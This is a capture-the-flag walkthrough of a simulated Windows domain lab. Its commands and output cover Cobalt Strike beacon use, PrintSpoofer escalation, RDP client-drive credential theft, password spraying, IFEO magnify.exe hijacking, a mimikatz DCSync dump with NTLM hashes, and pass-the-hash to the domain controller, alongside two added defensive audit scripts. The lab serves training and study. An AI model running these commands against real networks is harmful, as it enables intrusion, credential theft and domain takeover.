春秋云镜 penetration range: Tsclient

Target description:

Tsclient is a medium-difficulty lab environment. Completing the challenge helps players understand the proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement techniques used in internal network penetration, deepens their understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. The range has 3 flags in total, spread across different target machines.

Topics covered: MSSQL, Kerberos, domain penetration, RDP, privilege escalation

Walkthrough:

flag1

Start with a round of information gathering using fscan.


There is an MSSQL weak password:

MSSQL 39.99.239.83:1433 sa 1qaz!QAZ

We connect to it directly with MDUT:

https://github.com/SafeGroceryStore/MDUT/releases/tag/v2.1.1

Upload fscan and scan the internal network:

[05/22 20:22:29] [*] Tasked beacon to run: C:/Users/Public/fscan.exe -h 172.22.8.1/24
[05/22 20:22:29] [+] host called home, sent: 73 bytes
[05/22 20:22:39] [+] received output:

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.8.18 is alive    # current web host
(icmp) Target 172.22.8.31 is alive
(icmp) Target 172.22.8.15 is alive
(icmp) Target 172.22.8.46 is alive
[*] Icmp alive hosts len is: 4
172.22.8.46:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:1433 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.31:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:445 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.31:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:139 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.31:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:135 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.46:80 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.18:80 open
Open result.txt error, open result.txt: Access is denied.
172.22.8.15:88 open
Open result.txt error, open result.txt: Access is denied.
[*] alive ports len is: 16
start vulscan
[*] NetInfo
[*]172.22.8.18
[->]WIN-WEB
[->]172.22.8.18
[->]2001:0:348b:fb58:103d:2481:d89d:9388
Open result.txt error, open result.txt: Access is denied.
[*] WebTitle http://172.22.8.46 code:200 len:703 title:IIS Windows Server
Open result.txt error, open result.txt: Access is denied.
[*] NetInfo
[*]172.22.8.31
[->]WIN19-CLIENT
[->]172.22.8.31
Open result.txt error, open result.txt: Access is denied.
[*] NetBios 172.22.8.31 XIAORANG\WIN19-CLIENT
Open result.txt error, open result.txt: Access is denied.
[*] NetInfo
[*]172.22.8.46
[->]WIN2016
[->]172.22.8.46
Open result.txt error, open result.txt: Access is denied.
[*] NetInfo
[*]172.22.8.15
[->]DC01
[->]172.22.8.15
Open result.txt error, open result.txt: Access is denied.
[*] WebTitle http://172.22.8.18 code:200 len:703 title:IIS Windows Server
Open result.txt error, open result.txt: Access is denied.
[*] NetBios 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393
Open result.txt error, open result.txt: Access is denied.
[*] NetBios 172.22.8.15 [+] DC:XIAORANG\DC01
Open result.txt error, open result.txt: Access is denied.
[+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
Open result.txt error, open result.txt: Access is denied.

Findings:

WIN-WEB (this host): 172.22.8.18
WIN19-CLIENT: 172.22.8.31, joined to the domain; domain name XIAORANG
DC01: 172.22.8.15; from its name and the NetBIOS result of the .31 host, this is the domain controller
WIN2016: 172.22.8.46, Windows Server 2016, FQDN WIN2016.xiaorang.lab

Privilege escalation on WIN-WEB

Upload PrintSpoofer.exe through MDUT for privilege escalation:

https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

Command:

beacon> shell C:/Users/Public/PrintSpoofer32.exe -i -c "whoami"


Use it to run the uploaded Cobalt Strike payload and the new beacon comes back elevated:

beacon> shell C:/Users/Public/PrintSpoofer32.exe -i -c "C:/Users/Public/b.exe"


With SYSTEM privileges, try looking for the flag directly.

As in earlier labs, just browse around; it is still in the usual place.

shell type C:\Users\Administrator\flag\flag01.txt


flag01: flag{ce5d1fe4-c84f-4522-8d5c-e868f29bd63f}

A hint is given here: Maybe you should focus on user sessions…

So pay attention to session information.

flag2

Focus on enumerating user information, then.


Enumerate john:


shell quser || qwinsta    # list logged-on users


The three commands above show that user John is of type Admin and that his session is an RDP remote connection. Inject into one of John's processes to get a session running as John: inject pid


Run shell net use to view the network connections.


Then look inside it and find a txt file:

shell dir \\TSCLIENT\C
shell type \\TSCLIENT\C\credential.txt


xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#

Do you know how to hijack Image?

It records the account and password of a domain user, and contains another hint: image hijacking.
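As an added defender-side check (not part of the original writeup), the PowerShell below parses quser output into objects, flags which sessions came in over RDP, and reports whether the "Do not allow drive redirection" policy is enforced; that policy is what would have stopped the client's C: drive from appearing as \\TSCLIENT\C inside John's session. The helper name Get-InteractiveSession is my own; run it on the host as a local administrator.

```powershell
# Added example, not code from the original writeup. Function name is my own.
function Get-InteractiveSession {
    # quser prints fixed-width columns; the caller's own session is marked with a leading '>',
    # and a disconnected session leaves SESSIONNAME empty, which shifts the remaining fields.
    quser 2>$null | Select-Object -Skip 1 | ForEach-Object {
        $fields = ($_.Trim() -replace '^>', '') -split '\s{2,}'
        if ($fields.Count -eq 5) { $fields = @($fields[0], '') + $fields[1..4] }
        [pscustomobject]@{
            User    = $fields[0]
            Session = $fields[1]
            Id      = [int]$fields[2]
            State   = $fields[3]
            IsRdp   = $fields[1] -like 'rdp-tcp*'
        }
    }
}

# 1. Which sessions exist, and which are RDP sessions (only those can carry redirected client drives).
Get-InteractiveSession | Format-Table -AutoSize

# 2. Is client drive redirection blocked by policy? The GPO "Do not allow drive redirection"
#    writes fDisableCdm=1 under the Terminal Services policy key; a missing value or 0 means allowed.
$tsPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
$cdm = (Get-ItemProperty -Path $tsPolicy -Name fDisableCdm -ErrorAction SilentlyContinue).fDisableCdm
if ($cdm -eq 1) {
    'Client drive redirection is disabled by policy.'
} else {
    Write-Warning ('Client drive redirection is allowed: every process in an RDP session, ' +
                   'including one an attacker injects into, can read the connecting client''s drives via \\TSCLIENT\<letter>.')
}
```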

Password spraying

With the proxy set up, we try password spraying to see which hosts this account can log into.

proxychains4 -q  crackmapexec smb 172.22.8.0/24 -u 'Aldrich' -p 'Ald@rLMWuy7Z!#'

It hits WIN2016, WIN19-CLIENT and DC01 (in fact every host in the internal network accepts this account and password).


WIN19 should be the domain controller; after changing the password, all of them can be logged into.

Account: xiaorang.lab\Aldrich
Password: Ald@rLMWuy7Z!#
kali
proxychains4 rdesktop 172.22.8.31
proxychains4 rdesktop 172.22.8.46
First change the password through rdesktop
Ald@rLMWuy7Z!# -> 1qaz@WSX

On Windows, use Proxifier
mstsc

Ald@rLMWuy7Z!# -> 1qaz@WSX

We log into 172.22.8.46.

The machine turns out to be domain-joined.

Pinging Baidu shows it has no outbound internet access.

WIN2016 privilege escalation via image hijacking (IFEO)

Following the earlier hint, image hijacking is the way in. Running the command below shows that NT AUTHORITY\Authenticated Users can modify the registry key, i.e. any user who logs in with an account and password can modify it. Using this property, modify the registry and escalate through Magnifier.

powershell: Get-ACL -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl
# shows that NT AUTHORITY\Authenticated Users can modify the registry key
# i.e. any user who logs in with an account and password can modify it; use this to modify the registry and escalate via Magnifier

# run the following statement to modify the registry
cmd: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Start > user > Lock, then open Magnifier from the bottom-right of the lock screen to get a cmd running as SYSTEM.
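As an added audit script (not part of the original writeup), the PowerShell below lists every IFEO entry that carries a Debugger value, marks the accessibility tools reachable from the lock screen, and then checks the ACL of the IFEO key for the misconfiguration exploited above: write rights held by a principal other than Administrators, SYSTEM or TrustedInstaller. It assumes the default IFEO key path and needs to be run as a local administrator.

```powershell
# Added example, not code from the original writeup.
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# 1. Report every image with a Debugger value. Accessibility tools launched from the lock
#    screen run as SYSTEM, so a Debugger set on one of them is the pattern used in this lab.
$lockScreenTools = 'sethc.exe', 'utilman.exe', 'osk.exe', 'magnify.exe', 'narrator.exe', 'displayswitch.exe'
$hits = Get-ChildItem -Path $ifeo | ForEach-Object {
    $dbg = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($dbg) {
        [pscustomobject]@{
            Image      = $_.PSChildName
            Debugger   = $dbg
            LockScreen = $lockScreenTools -contains $_.PSChildName.ToLower()
        }
    }
}
if ($hits) { $hits | Format-Table -AutoSize } else { 'No IFEO Debugger values set.' }

# 2. Who may create subkeys or set values under the IFEO key? Only Administrators, SYSTEM and
#    TrustedInstaller should; "Authenticated Users" with these rights is the finding above.
#    The mask deliberately excludes read bits (ReadKey, ReadPermissions) so a normal read-only
#    ACE does not trigger; generic rights (e.g. GENERIC_WRITE) are not decoded, so review any
#    negative mask by hand.
$writeMask = [int][System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, Delete, ChangePermissions, TakeOwnership'
$trusted = 'BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM', 'NT SERVICE\TrustedInstaller', 'CREATOR OWNER'
(Get-Acl -Path $ifeo).Access |
    Where-Object { $_.AccessControlType -eq 'Allow' -and (([int]$_.RegistryRights -band $writeMask) -ne 0) } |
    Where-Object { $trusted -notcontains $_.IdentityReference.Value } |
    ForEach-Object {
        Write-Warning ('Unexpected write access on IFEO key: {0} ({1}, inherited={2})' -f $_.IdentityReference, $_.RegistryRights, $_.IsInherited)
    }
```

A warning for NT AUTHORITY\Authenticated Users reproduces the Get-ACL finding from this lab in machine-checkable form; the same two checks can be pointed at the Wow6432Node IFEO key on 64-bit hosts.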


The flag is in the same directory as before.


flag02: flag{a176e8ee-6378-40a8-b38d-08cac2606d27}

flag3

cd ../../
cd Users/Aldr*

Create a pivot listener on the beacon that came in through the proxy, generate a payload from that listener, then simply copy and paste it onto the .46 machine and run it.

Then run it through the image hijack to get SYSTEM privileges.


Taking the domain controller

Domain user information gathering

logonpasswords


shell net user /domain

Upload mimikatz as well:

shell C:\\Users\\Public\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
[05/26 18:58:21] [*] Tasked beacon to run: C:\\Users\\Public\\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"
[05/26 18:58:21] [+] host called home, sent: 137 bytes
[05/26 18:58:22] [+] received output:

.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt 3ffd5b58b4a6328659a606c3ea6f9b63 514
1000 DC01$ f96c2590d6a79fcb1ef4238ade63a071 532480
500 Administrator 2c9d81bdcf3ec8b1def10328a7cc2f08 512
1103 WIN2016$ 6e3b4351775ddedcfee0c3632f9747c4 16781312
1104 WIN19-CLIENT$ e2f7b9fef4b865cf2f721d512ad3c35a 16781312
1105 Aldrich 161cff084477fe596a5db81874498a24 512

mimikatz(commandline) # exit
Bye!

mimikatz obtains the domain administrator's hash.

Lateral movement with the impacket toolkit

https://github.com/fortra/impacket/releases/tag/impacket_0_12_0

Use smbexec.py from impacket to pass the hash and log into the domain controller DC01 (172.22.8.15), obtain a SYSTEM cmd shell, and take flag03.

proxychains4 python3 smbexec.py -hashes :2c9d81bdcf3ec8b1def10328a7cc2f08 administrator@172.22.8.15

From here, lateral movement is possible.

type c:\users\administrator\flag\flag03.txt

This gives the last flag.


flag03: flag{a35a1425-b7e0-4c06-9282-3e6498145792}